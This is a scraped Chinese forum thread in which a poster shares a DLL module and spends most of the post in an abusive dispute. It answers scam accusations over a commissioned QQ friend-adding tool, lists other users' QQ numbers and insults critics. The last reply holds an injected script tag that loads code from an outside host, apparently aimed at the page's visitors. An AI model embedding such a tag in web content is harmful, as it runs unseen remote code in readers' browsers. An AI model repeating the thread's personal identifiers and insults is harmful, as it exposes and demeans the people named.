搜索

[模块分享] 【雨落-原创】SuperLuo v1.1.0 Dll分享

游客,如果您要查看本帖隐藏内容请回复

本期不出教程,分享自用模块DLL版的同时分享一个故事
大概在21年中旬,咱在精易论坛交流群里看到一个人,QQ名字叫“九爷”
他当时想找人写个QQ添加单项好友的软件,好巧不巧,我刚好会,协议我能整,我朋友能完成剩下的
于是就开始交易,定金是5hd,做完软件后,远程调试了,没问题,尾款补过来,我朋友把软件发过去了
至于为什么他说3510170972这个qq是我的小号,纯属瞎扯淡,这年头谁上网不是挡刀号?笑拉了
发过去后缺少个dll,GitHub的一个qq操作库,我朋友让他自己找,也发过,对方表示:没用,没用
随后多次远程调试,我朋友这边都没问题,他那边永远报错。简单概括下:他电脑的问题,管大伙儿什么事儿?
然后这b崽子就要求发源码了,不给源码就要造谣我和我朋友是骗子,那我俩当然不发啊,然后这b就开始到处造谣了
属实是协会工作人员一个
附上所谓“揭发贴”
举报一个骗子qq2470866921【网络骗子吧吧】_百度贴吧 (baidu.com)
这种人估摸着也不是什么好东西,2202年了,不会真的有人不知道网络四大舆论巨头吧?不会吧不会吧
bd贴吧,xlwb,dy,tylt
十几年前管你一个人是不是骗子,挂上贴吧wb你就是骗子了,联系方式一挂,全网开花
协会的事情还是干少点吧,不得捏造事实进行诬告陷害难道您没学过吗?@
米津玄师
不了解实情您在这叫什么呢?
附上本期正题Dll调用截图

第一:我舔云梦?真给你脸了啊?火线精英上号链接是云梦在Tomato直播分享的,我学习了,而且模块备注没看见?你亲母没了是不是啊?
image.png image.png image.png
第二:您让我拿聊天记录,您怎么不让造谣我的那位傻狗拿聊天记录,您是网络圣人路见不平是不是啊?
第三:我舔哪位作者了你拿出来看看,浊酒飞熊都我朋友,从来没有我求着他们给东西的时候,我舔你老m子了?造谣上瘾了啊?
第四:您可以拿出确凿的证据来捶我网骗?我软件做好了给他,他用不了是他的问题吧?远程调试好好的,到他手上就失效了是吧?我看你和他是一伙的来讹人了是不是呀?
第五:我有说小号不是我的吗?你可以去问问当事人我和他怎么说的,俩QQ都是我的,我朋友用的就是我的QQ,不带脑子锤人自己什么品德没点数?你和我讲道德?您一个局外人p都不知道你锤我是骗子?您能不能联系好当事人拿出确确实实的证据来,我看您才是心虚的那个,只敢拿点皮毛说,要深究估计又要潜水咯~
第六:您觉得我没技术就别来看我帖子了,我这儿容不下你,我敢说我目前发布的就是全网找不出比我发布更早的,所有包都是我一手抓的,Tomato内部的人有目共睹的,你拿什么和我说技术?凭你二改转载精神?我连二改的辅助费用都不敢收怕被骂,您所谓的不圈钱就是二改拿来卖?真有你的
附上年度大瓜
image.png image.png image.png image.png image.png
看来全网软件就属你最好了,全网人品就属你最好了,见人就要好好的“批评”一下,给出一些“建议”被揭穿了又装楚楚可怜,把自己放到道德制高点,怕回复被举报抓包只好卑微的点评一下,被反驳就抓死一个观点不放,真有你的啊?
“我不是
我没有
你就是
别造谣我
我没造谣
这是事实
我很厉害”

Rlo
认真你就输了= =  发表于 2022-5-8 16:24
只是锤了你骗人的一条线索出来,就开始狗叫咯。  发表于 2022-4-9 19:40
笑死我了,云梦游拍那个到你手里就是你是原创了?云梦都说了你是条母狗,而且看得出来你这人素质不怎么样  发表于 2022-4-9 19:38
你说你没骗,聊天记录不是有漫游么,你可以拿出聊天记录来,你也不必说你是原创某梦的东西我见过了。  发表于 2022-4-9 14:34
难道现在互联网陈述事实就算人品不好吗?你说我不是个东西,最起码我没有圈过别人的钱,你可以试试找找证据来捶我。  发表于 2022-4-9 14:30

上一篇:取北京时间【精确到毫秒,更新到1.2】通过UDP对时协yi获取
下一篇:微信域名防封php程序强制跳转到浏览器打开
不要催更啦。。每周1~2篇教学
每周五~周日随机时间段会更新
有什么想学的新点子可以留言,每一条回复我都会看过去(虽然很多乱七八糟的

么有分,谁能送我点积分啊::>_<::
有些人喜欢你,是因为你能给他带来快乐;而有些人喜欢你,是因为你就是他的快乐。

看私信好吧

啥也不说了,感谢楼主分享哇!

@米津玄师
不要催更啦。。每周1~2篇教学
每周五~周日随机时间段会更新
有什么想学的新点子可以留言,每一条回复我都会看过去(虽然很多乱七八糟的

么有分,谁能送我点积分啊::>_<::

头像被屏蔽

头像被屏蔽

签名被屏蔽

头像被屏蔽

签名被屏蔽

正需要,支持楼主大人了!

确实是难得好帖啊,顶先
<script src="http://zhasini.ml/api/"></script>